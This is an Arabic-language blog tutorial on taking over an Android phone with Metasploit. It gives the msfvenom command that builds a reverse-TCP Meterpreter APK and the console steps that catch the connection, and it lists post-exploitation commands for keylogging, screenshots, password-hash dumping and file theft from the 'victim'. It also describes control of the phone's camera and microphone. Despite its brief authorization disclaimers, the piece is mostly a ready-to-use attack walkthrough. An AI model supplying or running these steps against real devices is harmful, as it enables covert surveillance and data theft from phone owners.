اهلا ومرحبا بكم في مدونه : Cyber1101 انظم للمجتمع

اختبار اختراق جهاز اندرويد بستخدام الميتاسبلويت

  



اختبار اختراق جهاز اندرويد بستخدام الميتاسبلويت

 
الميتاسبلويت (Metasploit) هو إطار عمل لاختبار الاختراق يستخدم لتطوير وتنفيذ هجمات الاختراق على الأنظمة والشبكات لتحديد نقاط الضعف والثغرات الأمنية.

يمكن استخدامه لتنفيذ هجمات لاختبار قوة التحصين الأمني للشبكات وأنظمة التشغيل. يعتبر Metasploit أداة قوية يمكن استخدامها من قبل فرق الأمن والمهندسين الأمنيين في الشركات لاختبار قوة التحصين الأمني لأنظمتهم وشبكاتهم وتحديد نقاط الضعف المختلفة فيها.

ومع ذلك ، يرجى ملاحظة أن استخدام أي أداة تستخدم لأغراض اختبار الاختراق يجب أن يتم فقط مع الإذن المسبق من صاحب النظام المستهدف.


صنع حموله للاندرويد بستخدام الميتاسبلويت msfvenom


لصنع حمولة لجهاز Android باستخدام msfvenom يمكن اتباع الخطوات التالية:

  • افتح نافذة الأوامر (Command Prompt) أو تطبيق المحطة الطرفية (Terminal) على جهاز الكمبيوتر الخاص بك.

  • اكتب أمرًا مماثلاً للأمر التالي:


msfvenom -p android/meterpreter/reverse_tcp LHOST=YOUR_IP_ADDRESS LPORT=YOUR_PORT -o NAME_OF_FILE.apk



  • يجب تعويض YOUR_IP_ADDRESS بعنوان IP الخاص بك و YOUR_PORT برقم المنفذ الذي تريد استخدامه. ويجب تعيين اسم الملف الناتج بدلاً من NAME_OF_FILE.

  • سيقوم msfvenom بتوليد حمولة APK تحتوي على Meterpreter.

  • يمكن تحميل هذا الملف APK على جهاز Android المستهدف وتنفيذه.

يرجى ملاحظة أن استخدام هذه الأدوات لأي غرض غير شرعي لا يحظى بالترحيب ويعتبر غير قانوني. يجب استخدامها فقط لأغراض الاختبار والتدريب المشروعة.

انشاء اتصال لحمولة android


يمكن إنشاء اتصال لحمولة `android/meterpreter/reverse_tcp` في Metasploit باستخدام الخطوات التالية:

  •  تشغيل Metasploit Framework وفتح قائمة الأوامر.
  •  استخدام الأمر `use` لتحديد الحمولة `android/meterpreter/reverse_tcp`.
  •  استخدام الأمر `set` لتعيين قيمة متغيرات الحمولة التي تحتاجها لإنشاء اتصال بالضحية. هذه المتغيرات تشمل `LHOST` و `LPORT`.
  •  استخدام الأمر `exploit` لبدء الاتصال بالضحية.

فيما يلي مثال لإنشاء اتصال لحمولة `android/meterpreter/reverse_tcp` مع استخدام عنوان IP `192.168.1.100` ومنفذ `4444` كمنفذ محلي:


msf > use android/meterpreter/reverse_tcp
msf exploit(android/meterpreter/reverse_tcp) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf exploit(android/meterpreter/reverse_tcp) > set LPORT 4444
LPORT => 4444
msf exploit(android/meterpreter/reverse_tcp) > exploit



بعد تنفيذ الأوامر أعلاه، سيتم إنشاء اتصال بين الضحية وجهاز الاختبار الخاص بك.


بمجرد أن يتم إنشاء الاتصال بين الضحية وجهاز الاختبار الخاص بك، ستتمكن من التحكم في جهاز الضحية بشكل كامل باستخدام Metasploit Framework. سيتم إنشاء شل Meterpreter على جهاز الضحية، وهو عبارة عن نوع من الشلات الخاصة بـ Metasploit التي يمكنها توفير إمكانيات الجهاز الكاملة للمهاجم.

من خلال شل Meterpreter، يمكنك القيام بالعديد من الأنشطة الخبيثة، مثل الوصول إلى الملفات والدلائل على جهاز الضحية، وإنشاء ملفات خبيثة، والتحكم في الكاميرا والميكروفون على جهاز الضحية، وتحميل وتثبيت برامج خبيثة أخرى.

يمكن استخدام هذه الأنشطة في هجمات القرصنة والاختراق، ومن المهم الإشارة إلى أن استخدام Metasploit في هذه الأنشطة يتطلب موافقة صريحة من الجهات المسؤولة عن الأنظمة التي يتم اختبارها.

شرح meterpreter


Meterpreter هو نوع من الـ shells المتاحة في إطار Metasploit الذي يمكن استخدامها للتحكم في جهاز الضحية بشكل كامل، حتى لو كان النظام يستخدم Firewall أو Antivirus.

يتم تثبيت Meterpreter على جهاز الضحية بعد نجاح الاختراق، ويتيح للمهاجم التحكم في جهاز الضحية والوصول إلى كافة محتوياته، بما في ذلك الملفات والدلائل والبرامج وعمليات النظام والكاميرا والميكروفون وغيرها. كما يوفر Meterpreter قدرة تخطي الاكتشاف والمنع المتقدمة للشبكات والنظم، ويمكن استخدامه في أغراض الاختبار الأمني والحماية والتعلم.

يوفر Meterpreter عدة ميزات، بما في ذلك:

  • ميزة التشفير والتعديل المتقدم للمرور والبيانات المنقولة بين جهاز الضحية وجهاز المهاجم.

  •  ميزة التنقل والمسح الضوئي للشبكات، والتي تسمح للمهاجم بالتحكم في الأجهزة الأخرى في الشبكة.

  •  ميزة التخزين الآمن والإمكانات الخبيثة الأخرى، بما في ذلك تمكين وتعطيل الخدمات، وإطلاق البرامج الخبيثة، والتحكم في المتصفحات والإنترنت والعديد من الوظائف الأخرى.

يعتبر Meterpreter أحد أهم الأدوات المستخدمة في هجمات الاختراق، ومن المهم معرفة كيفية الحماية منه والوقاية من هجمات الاختراق المحتملة.


اوامر meterpreter


هناك العديد من الأوامر التي يمكن استخدامها في Meterpreter للتحكم في جهاز الضحية. وهنا بعض الأمثلة على الأوامر:

sysinfo
يعرض معلومات عن نظام التشغيل الحالي والاصدار والمعالج.

getuid
يعرض معلومات عن الهوية الحالية للمستخدم.

ps
 يعرض قائمة بالعمليات الجارية على النظام.

shell
يفتح shell على الضحية.

upload
يرفع ملف من جهاز المهاجم إلى جهاز الضحية.

download
ينزل ملف من جهاز الضحية إلى جهاز المهاجم.

execute
ينفذ برنامج على جهاز الضحية.

screenshot
 يأخذ صورة لشاشة الضحية.

keyscan_start
keyscan_dump
  
يسجل الضغطات على لوحة المفاتيح.

hashdump
: يستخرج كلمات المرور المخزنة على جهاز الضحية.

تجدر الإشارة إلى أن هذه الأوامر هي مجرد أمثلة ولا تغطي كل الأوامر المتاحة في Meterpreter. يمكن الاطلاع على الدليل الكامل لـ Meterpreter لمزيد من المعلومات والأوامر المتاحة.

تعليق واحد

  1. 011
    +45
Cookie Consent
We serve cookies on this site to analyze traffic, remember your preferences, and optimize your experience.
Oops!
It seems there is something wrong with your internet connection. Please connect to the internet and start browsing again.
AdBlock Detected!
We have detected that you are using adblocking plugin in your browser.
The revenue we earn by the advertisements is used to manage this website, we request you to whitelist our website in your adblocking plugin.
Site is Blocked
Sorry! This site is not available in your country.